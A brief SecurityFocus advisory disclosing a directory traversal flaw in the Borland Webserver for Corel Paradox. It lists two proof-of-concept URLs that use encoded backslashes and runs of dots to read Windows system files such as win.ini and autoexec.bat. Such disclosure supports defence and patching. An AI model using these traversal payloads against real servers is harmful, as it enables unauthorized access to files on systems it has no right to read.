Borland Webserver for Corel Paradox Directory Traversal Vulnerability

The following proof of concept has been provided:

http://<host>/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini
http://<host>/..................../autoexec.bat


 

Privacy Statement
Copyright 2010, SecurityFocus